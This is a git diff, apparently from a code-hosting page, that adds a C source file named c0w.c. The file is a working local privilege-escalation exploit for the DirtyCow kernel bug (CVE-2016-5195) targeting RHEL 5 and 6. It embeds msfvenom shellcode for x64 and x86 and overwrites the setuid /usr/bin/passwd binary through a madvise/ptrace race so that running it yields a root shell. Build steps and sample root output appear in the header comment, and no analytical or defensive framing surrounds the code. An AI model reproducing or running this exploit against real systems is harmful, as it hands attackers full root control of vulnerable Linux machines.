ulisesojeda · June 27, 2021 10:40 · Oct 23, 2016
diff --git a/c0w.c b/c0w.c
@@ -0,0 +1,131 @@
+/*
+* A PTRACE_POKEDATA variant of CVE-2016-5195
+* should work on RHEL 5 & 6
+* 
+* (un)comment correct payload (x86 or x64)!
+* $ gcc -pthread c0w.c  -o c0w
+* $ ./c0w
+* DirtyCow root privilege escalation
+* Backing up /usr/bin/passwd.. to /tmp/bak
+* mmap fa65a000
+* madvise 0
+* ptrace 0
+* $ /usr/bin/passwd 
+* [root@server foo]# whoami 
+* root
+* [root@server foo]# id
+* uid=0(root) gid=501(foo) groups=501(foo)
+* @KrE80r
+*/
+#include <fcntl.h>
+#include <pthread.h>
+#include <string.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <sys/mman.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/ptrace.h>
+#include <unistd.h>
+
+int f;
+void *map;
+pid_t pid;
+pthread_t pth;
+struct stat st;
+
+// change if no permissions to read
+char suid_binary[] = "/usr/bin/passwd";
+
+/*
+* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
+*/ 
+unsigned char shell_code[] = {
+  0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
+  0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
+  0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
+  0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
+  0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
+  0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
+};
+unsigned int sc_len = 177;
+
+/*
+* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
+unsigned char shell_code[] = {
+  0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
+  0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
+  0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
+  0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
+  0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
+  0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
+  0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
+  0x89, 0xe1, 0xcd, 0x80
+};
+unsigned int sc_len = 136;
+*/
+
+void *madviseThread(void *arg) {
+  int i,c=0;
+  for(i=0;i<200000000;i++)
+    c+=madvise(map,100,MADV_DONTNEED);
+  printf("madvise %d\n\n",c);
+}
+
+
+int main(int argc,char *argv[]){
+
+  printf("                                \n\
+   (___)                                   \n\
+   (o o)_____/                             \n\
+    @@ `     \\                            \n\
+     \\ ____, /%s                          \n\
+     //    //                              \n\
+    ^^    ^^                               \n\
+", suid_binary);
+  char *backup;
+  printf("DirtyCow root privilege escalation\n");
+  printf("Backing up %s to /tmp/bak\n", suid_binary);
+  asprintf(&backup, "cp %s /tmp/bak", suid_binary);
+  system(backup);
+
+  f=open(suid_binary,O_RDONLY);
+  fstat(f,&st);
+  map=mmap(NULL,st.st_size+sizeof(long),PROT_READ,MAP_PRIVATE,f,0);
+  printf("mmap %x\n\n",map);
+  pid=fork();
+  if(pid){
+    waitpid(pid,NULL,0);
+    int u,i,o,c=0,l=sc_len;
+    for(i=0;i<10000/l;i++)
+      for(o=0;o<l;o++)
+        for(u=0;u<10000;u++)
+          c+=ptrace(PTRACE_POKETEXT,pid,map+o,*((long*)(shell_code+o)));
+    printf("ptrace %d\n\n",c);
+   }
+  else{
+    pthread_create(&pth,
+                   NULL,
+                   madviseThread,
+                   NULL);
+    ptrace(PTRACE_TRACEME);
+    kill(getpid(),SIGSTOP);
+    pthread_join(pth,NULL);
+    }
+  return 0;
+}
+
No results found